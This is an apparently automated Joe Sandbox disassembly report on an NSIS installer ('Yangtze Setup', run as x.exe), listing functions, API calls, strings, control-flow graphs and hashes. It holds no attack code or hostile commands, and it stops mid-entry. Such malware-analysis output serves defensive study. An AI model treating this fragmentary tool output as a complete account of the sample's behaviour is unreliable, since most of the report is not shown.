                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: CountTick$FilePointerwsprintf
                                                  • String ID: ... %d%%$a;y
                                                  • API String ID: 999035486-1851479155
                                                  • Opcode ID: 77df9ffe954ba656bc8ee870969db9896226f4845f185e2f0a96eb20ba924328
                                                  • Instruction ID: 06c4d9898bb166683d4174fecb5e767d4f6982c6fd3e4095b3bdfd4ef86d7bf3
                                                  • Opcode Fuzzy Hash: 77df9ffe954ba656bc8ee870969db9896226f4845f185e2f0a96eb20ba924328
                                                  • Instruction Fuzzy Hash: E451C2316093029FD7109F2ADE44A2B7BE8EB84749F10493EF961E33D0DB78D9058B5A
                                                  Function 00405F0B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 893 405f0b-405f2b GetSystemDirectoryA 894 405f45 893->894 895 405f2d-405f2f 893->895 897 405f4b 894->897 895->894 896 405f31-405f3c 895->896 896->897 898 405f3e-405f43 896->898 899 405f50-405f75 wsprintfA LoadLibraryExA 897->899 898->899
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F22
                                                  • wsprintfA.USER32 ref: 00405F5A
                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME
                                                  • API String ID: 2200240437-4069249669
                                                  • Opcode ID: 328398ca082f181730c16b0349dde6f344f9270e4e6bb06fdeaee7a933ca8020
                                                  • Instruction ID: e7aab654e534ef54270f9ee62e2ddc6b6f5892f8449d48162b61027427409848
                                                  • Opcode Fuzzy Hash: 328398ca082f181730c16b0349dde6f344f9270e4e6bb06fdeaee7a933ca8020
                                                  • Instruction Fuzzy Hash: EFF0F070500A096BDB10E7549E0CFDBBBACEB08300F4441BAA685F21C2DB7CD9548FAC
                                                  Function 00406712 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 900 406712-40671c 901 40671d-406747 GetTickCount GetTempFileNameA 900->901 902 406751 901->902 903 406749-40674b 901->903 905 406753-406756 902->905 903->901 904 40674d-40674f 903->904 904->905
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00406725
                                                  • GetTempFileNameA.KERNELBASE(?,nsa,00000000,?), ref: 0040673F
                                                  Strings
                                                  • nsa, xrefs: 00406736, 0040673B
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406719
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406715
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                                  • API String ID: 1716503409-3664342310
                                                  • Opcode ID: b66cbe9e7096e1d75736f8169523dabc6ee9111b4659411c8d7956cc4c3e8ea7
                                                  • Instruction ID: c715126259bcb0c20df8e44089cbc07843db4cfbf05509f9a25adcd02d055017
                                                  • Opcode Fuzzy Hash: b66cbe9e7096e1d75736f8169523dabc6ee9111b4659411c8d7956cc4c3e8ea7
                                                  • Instruction Fuzzy Hash: 99F0A736348204BBD7105E59DC04BDA7B5AEF917A4F11C03BFA499F280D6B0995887A8
                                                  Function 004065A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 906 4065a6-4065bc GetModuleHandleA 907 4065c8-4065d0 GetProcAddress 906->907 908 4065be-4065bf call 405f0b 906->908 910 4065d6-4065d8 907->910 911 4065c4-4065c6 908->911 911->907 911->910
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403612,0000000C), ref: 004065B4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004065D0
                                                    • Part of subcall function 00405F0B: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F22
                                                    • Part of subcall function 00405F0B: wsprintfA.USER32 ref: 00405F5A
                                                    • Part of subcall function 00405F0B: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                  • API String ID: 2547128583-890815371
                                                  • Opcode ID: 474d5a08c42df23931da975fa07a75a813ac460069a08d19125ba75fb7d4e5e6
                                                  • Instruction ID: de8a04aa7dd198a7f218550cceadbcddc2fe281ed396dd36e270b18fc18a020b
                                                  • Opcode Fuzzy Hash: 474d5a08c42df23931da975fa07a75a813ac460069a08d19125ba75fb7d4e5e6
                                                  • Instruction Fuzzy Hash: F2D0C232101125AAC7101F626E0884F7B5DEF653617054436F500B2270EB38C41285BD
                                                  Function 00406637 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 912 406637-40666a call 40600b 915 4066a7 912->915 916 40666c-406699 RegQueryValueExA RegCloseKey 912->916 917 4066aa-4066ac 915->917 916->915 918 40669b-40669f 916->918 918->917 919 4066a1-4066a5 918->919 919->915 919->917
                                                  APIs
                                                  • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,?,?,00000400,?,00000400,0079F640,?,00000000,Call,?,?,00000002,00405D1D), ref: 0040667E
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00406689
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864
                                                  • Opcode ID: 348a1ff6dabfa7f22947fb088088ebb75b620af03bb5479432f5a1fe83be9b34
                                                  • Instruction ID: 5ac4c173f179bef86389b1526a62200db6bd105c5f748f75d6412e8125371e1b
                                                  • Opcode Fuzzy Hash: 348a1ff6dabfa7f22947fb088088ebb75b620af03bb5479432f5a1fe83be9b34
                                                  • Instruction Fuzzy Hash: FD015E76500109EFDF218F54DD06FEB7BA8EF15344F110126F902A2150D37ADA64DBA8
                                                  Function 0040637B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 920 40637b-4063ac CreateProcessA 921 4063ba-4063bb 920->921 922 4063ae-4063b7 CloseHandle 920->922 922->921
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(00000000,007A4400,00000000,00000000,00000000,04000000,00000000,00000000,0079FE40,?,?,?,007A4400,?), ref: 004063A4
                                                  • CloseHandle.KERNEL32(?,?,?,007A4400,?), ref: 004063B1
                                                  Strings
                                                  • "C:\Users\user\AppData\Local\Temp\x.exe" , xrefs: 0040637B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: "C:\Users\user\AppData\Local\Temp\x.exe"
                                                  • API String ID: 3712363035-3765332578
                                                  • Opcode ID: 8202fa193da256afb2ce7d3cc3cf2dcc093d8c3015d62dbdb19d77fae4ab4e4f
                                                  • Instruction ID: e6675464c7e02c9e6f40a08eadfa917627870c7fc8b5df1f488b699b67d22d46
                                                  • Opcode Fuzzy Hash: 8202fa193da256afb2ce7d3cc3cf2dcc093d8c3015d62dbdb19d77fae4ab4e4f
                                                  • Instruction Fuzzy Hash: B7E0BFB06002097FEB10AB64ED05F7B766DEB14704F004439BE51E6161D7749C158A68
                                                  Function 00405B8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 923 405b8d-405b9d CreateDirectoryA 924 405ba7-405baa 923->924 925 405b9f-405ba5 GetLastError 923->925 925->924
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403ABC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00405B95
                                                  • GetLastError.KERNEL32 ref: 00405B9F
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1375471231-3355392842
                                                  • Opcode ID: ffc7d6197e1beb19ef1624df4ffa93a3437123ffd0222c56b7c883f1d5fa86bc
                                                  • Instruction ID: b7822484475ce03664f601d60a2b90439915e27ad5fd05b043d352918c342bd8
                                                  • Opcode Fuzzy Hash: ffc7d6197e1beb19ef1624df4ffa93a3437123ffd0222c56b7c883f1d5fa86bc
                                                  • Instruction Fuzzy Hash: BFC08C327046309BC3701B75BE0CA87BFA8EF107A13124239F988E2220DA308C00CBE8
                                                  Function 73AD1606 Relevance: 4.6, APIs: 3, Instructions: 123COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 926 73ad1606-73ad1643 call 73ad2288 930 73ad176f-73ad1773 926->930 931 73ad1649-73ad164d 926->931 932 73ad164f-73ad1655 call 73ad1edd 931->932 933 73ad1656-73ad1661 call 73ad1f58 931->933 932->933 938 73ad1699-73ad16a0 933->938 939 73ad1663-73ad1669 933->939 940 73ad16c0-73ad16c4 938->940 941 73ad16a2-73ad16be call 73ad2128 call 73ad15f4 call 73ad157e GlobalFree 938->941 942 73ad166b-73ad166e 939->942 943 73ad168a-73ad168e 939->943 944 73ad16c6-73ad170f call 73ad1e71 call 73ad2128 940->944 945 73ad1711-73ad1717 call 73ad2128 940->945 966 73ad1718-73ad171c 941->966 948 73ad167a-73ad167b call 73ad2bc4 942->948 949 73ad1670-73ad1673 942->949 943->938 946 73ad1690-73ad1691 call 73ad2e4f 943->946 944->966 945->966 960 73ad1696 946->960 957 73ad1680 948->957 955 73ad1675-73ad1678 949->955 956 73ad1682-73ad1688 call 73ad1774 949->956 955->938 955->948 965 73ad1698 956->965 957->960 960->965 965->938 970 73ad175f-73ad1766 966->970 971 73ad171e-73ad1730 call 73ad1f1f 966->971 970->930 973 73ad1768-73ad1769 GlobalFree 970->973 976 73ad174f-73ad1751 971->976 977 73ad1732-73ad1736 971->977 973->930 976->970 979 73ad1753-73ad175e call 73ad1558 976->979 977->976 978 73ad1738-73ad1740 977->978 978->976 980 73ad1742-73ad1749 FreeLibrary 978->980 979->970 980->976
                                                  APIs
                                                    • Part of subcall function 73AD2288: GlobalFree.KERNEL32(?), ref: 73AD2901
                                                    • Part of subcall function 73AD2288: GlobalFree.KERNEL32(?), ref: 73AD2907
                                                    • Part of subcall function 73AD2288: GlobalFree.KERNEL32(?), ref: 73AD290D
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD16B8
                                                  • FreeLibrary.KERNEL32(?), ref: 73AD1743
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD1769
                                                    • Part of subcall function 73AD1EDD: GlobalAlloc.KERNEL32(00000040,?), ref: 73AD1F0C
                                                    • Part of subcall function 73AD1774: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,73AD1688,00000000), ref: 73AD1817
                                                    • Part of subcall function 73AD1E71: wsprintfA.USER32 ref: 73AD1EA4
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  • Associated: 00000002.00000002.136024401230.0000000073AD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024537814.0000000073AD4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.136024590519.0000000073AD6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                  • String ID:
                                                  • API String ID: 3962662361-0
                                                  • Opcode ID: 74d9b48e77aab707214db952b1fd71915bb9c4922b997ddea04bd51f760997b5
                                                  • Instruction ID: fd19961cb9ff4086ae608da2c2bbafebba067ed102f2804e7a75b4c968550beb
                                                  • Opcode Fuzzy Hash: 74d9b48e77aab707214db952b1fd71915bb9c4922b997ddea04bd51f760997b5
                                                  • Instruction Fuzzy Hash: A241D27252030D9FDB90AF34D946B9A37FDFB05210F14801BF90A5A2ADDB399545CB90
                                                  Function 004062E2 Relevance: 3.0, APIs: 2, Instructions: 46stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 983 4062e2-4062fd call 4067cb call 406876 988 406352 983->988 989 4062ff-40630c call 4069ae 983->989 991 406354-406356 988->991 993 406318-40631a 989->993 994 40630e-406312 989->994 996 406330-40633a lstrlenA 993->996 994->988 995 406314-406316 994->995 995->988 995->993 997 40631c-406323 call 40627e 996->997 998 40633c-40634b call 406207 GetFileAttributesA 996->998 1004 406325-406328 997->1004 1005 40632a-40632b call 406983 997->1005 998->988 1003 40634d-406350 998->1003 1003->991 1004->988 1004->1005 1005->996
                                                  APIs
                                                    • Part of subcall function 004067CB: lstrcpynA.KERNEL32(?,?,00000400,00403673,Yangtze Setup,NSIS Error), ref: 004067D8
                                                    • Part of subcall function 00406876: CharNextA.USER32(?,?,?,007A0288,004062F9,007A0288,007A0288,00000000,?,?,004063E0,?,00000000,76763410,?), ref: 00406884
                                                    • Part of subcall function 00406876: CharNextA.USER32(00000000), ref: 00406889
                                                    • Part of subcall function 00406876: CharNextA.USER32(00000000), ref: 0040689D
                                                    • Part of subcall function 004069AE: CharNextA.USER32(?,*?|<>/":,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A15
                                                    • Part of subcall function 004069AE: CharNextA.USER32(?,?,?,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A22
                                                    • Part of subcall function 004069AE: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A27
                                                    • Part of subcall function 004069AE: CharPrevA.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A3E
                                                  • lstrlenA.KERNEL32(007A0288,00000000,007A0288,007A0288,00000000,?,?,004063E0,?,00000000,76763410,?), ref: 00406331
                                                  • GetFileAttributesA.KERNELBASE(007A0288,007A0288), ref: 00406342
                                                    • Part of subcall function 0040627E: FindFirstFileA.KERNELBASE(00000000,007A1288,00000000,00406321,007A0288), ref: 00406289
                                                    • Part of subcall function 0040627E: FindClose.KERNEL32(00000000), ref: 00406295
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                                  • String ID:
                                                  • API String ID: 1879705256-0
                                                  • Opcode ID: 30b8f8359afb46c6e9ecef805bc41305e31ce6143b0c2c7ea5ef27afe7aba0a9
                                                  • Instruction ID: 23df20a40deb082083f444ef96d4f38a3a39f11c55e39e2b3b79373d85619f1b
                                                  • Opcode Fuzzy Hash: 30b8f8359afb46c6e9ecef805bc41305e31ce6143b0c2c7ea5ef27afe7aba0a9
                                                  • Instruction Fuzzy Hash: 52F0F6620003105AC72137390D89A2B1A8D5E0275870F5A7FFC93B22E3D63CCC3695ED
                                                  Function 004065DB Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00403204,C:\Users\user\AppData\Local\Temp\x.exe,80000000,00000003,?,?,?,?,?), ref: 004065DF
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 004065FF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
